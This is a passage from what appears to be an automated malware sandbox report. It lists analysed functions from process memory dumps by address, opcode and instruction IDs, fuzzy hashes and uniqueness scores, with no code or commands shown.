                                                • API String ID:
                                                • Opcode ID: e44954c5eaf5e9319b950fc15fbc6e3fed33352ad5955bf202badad8ddd115d3
                                                • Instruction ID: 5a1abffd5ef7d1c4620b3d465c524da8a8277d862e7755fe0c2500153e1a2a0d
                                                • Opcode Fuzzy Hash: e44954c5eaf5e9319b950fc15fbc6e3fed33352ad5955bf202badad8ddd115d3
                                                • Instruction Fuzzy Hash: 4821F275604304DFDB18EF60E980B16BBA5EB84318F24C969E8094B286C736D907CBA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0017D487, Relevance: .1, Instructions: 56COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2359547765.000000000017D000.00000040.00000001.sdmp, Offset: 0017D000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: bec0cbe3a67fafffba591d62ecb25f38171380338b06cae3889ceaf81ca29a76
                                                • Instruction ID: b8af6420bf83e7f03e9ccae9fc4a4c947ebe487dfcfd1548c4c0142e13566682
                                                • Opcode Fuzzy Hash: bec0cbe3a67fafffba591d62ecb25f38171380338b06cae3889ceaf81ca29a76
                                                • Instruction Fuzzy Hash: AE118176504244DFCB16CF14E5C4B16BF72FF94318F24C6A9D8094B656C336D856CBA2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0017D573, Relevance: .1, Instructions: 56COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2359547765.000000000017D000.00000040.00000001.sdmp, Offset: 0017D000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: bec0cbe3a67fafffba591d62ecb25f38171380338b06cae3889ceaf81ca29a76
                                                • Instruction ID: 075fd8a43547e0c9df279b4e536f4f995d1603f296b442e6f264c35f73dc1615
                                                • Opcode Fuzzy Hash: bec0cbe3a67fafffba591d62ecb25f38171380338b06cae3889ceaf81ca29a76
                                                • Instruction Fuzzy Hash: 1111AF76404284CFCB16CF10E9C4B16BF71FF94324F28C5A9E8090B216C336D856CBA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0018D017, Relevance: .1, Instructions: 53COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2359558703.000000000018D000.00000040.00000001.sdmp, Offset: 0018D000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 891f902d58dedbad28416925344a3d969c18e8e5d994e9510d10cfbfcd7c61e7
                                                • Instruction ID: 179e59172d0e725dcb2208a02c7f7cc0df1900b7958d20b8b7310d71074f9879
                                                • Opcode Fuzzy Hash: 891f902d58dedbad28416925344a3d969c18e8e5d994e9510d10cfbfcd7c61e7
                                                • Instruction Fuzzy Hash: A311BB75508380CFCB11CF10E584B15BBA1FB84314F28C6AAE8094B696C33AD90BCFA2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 005E0728, Relevance: .1, Instructions: 52COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2359751405.00000000005E0000.00000040.00000001.sdmp, Offset: 005E0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b6c87842533c48827f2b22f5bef0d71e18cbb8d3ba352358018fcf29705bdb8b
                                                • Instruction ID: 49fcec9839d3d14abacaf2b9c85fec138bd0397b87a64415fee7f5c29b3cc9ee
                                                • Opcode Fuzzy Hash: b6c87842533c48827f2b22f5bef0d71e18cbb8d3ba352358018fcf29705bdb8b
                                                • Instruction Fuzzy Hash: B6115EB5F142199F8B80EBB8D8409AEB7F5FF88710B108429E549E7354EB34AD028F91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 005E10CC, Relevance: .0, Instructions: 49COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2359751405.00000000005E0000.00000040.00000001.sdmp, Offset: 005E0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1b555f4a6de6909162bc33a39f724b976ef83bd7b71aaeb87558c9f2d46d03f8
                                                • Instruction ID: 38c87987adc8dffc74083342047dab113673eceba87a0955492ed458a8e453e3
                                                • Opcode Fuzzy Hash: 1b555f4a6de6909162bc33a39f724b976ef83bd7b71aaeb87558c9f2d46d03f8
                                                • Instruction Fuzzy Hash: 6B012231A00A008BCB18BB78E4941BCBBB2AF84314F02486CC19B9B650EF355999C796
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 005E0787, Relevance: .0, Instructions: 25COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2359751405.00000000005E0000.00000040.00000001.sdmp, Offset: 005E0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0e67354e1b6eaf9ac29c6030ee24425cde54474e3e754717ea418fd5faaddfa8
                                                • Instruction ID: 58fec58e2cb64999166e88a06c540f5f2a7301429a879ddcf690266e624f3769
                                                • Opcode Fuzzy Hash: 0e67354e1b6eaf9ac29c6030ee24425cde54474e3e754717ea418fd5faaddfa8
                                                • Instruction Fuzzy Hash: DDE09279F140188B8F44E7F8E8444DD73F1FF88225B104425D40AEB350EF34AC028B51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Non-executed Functions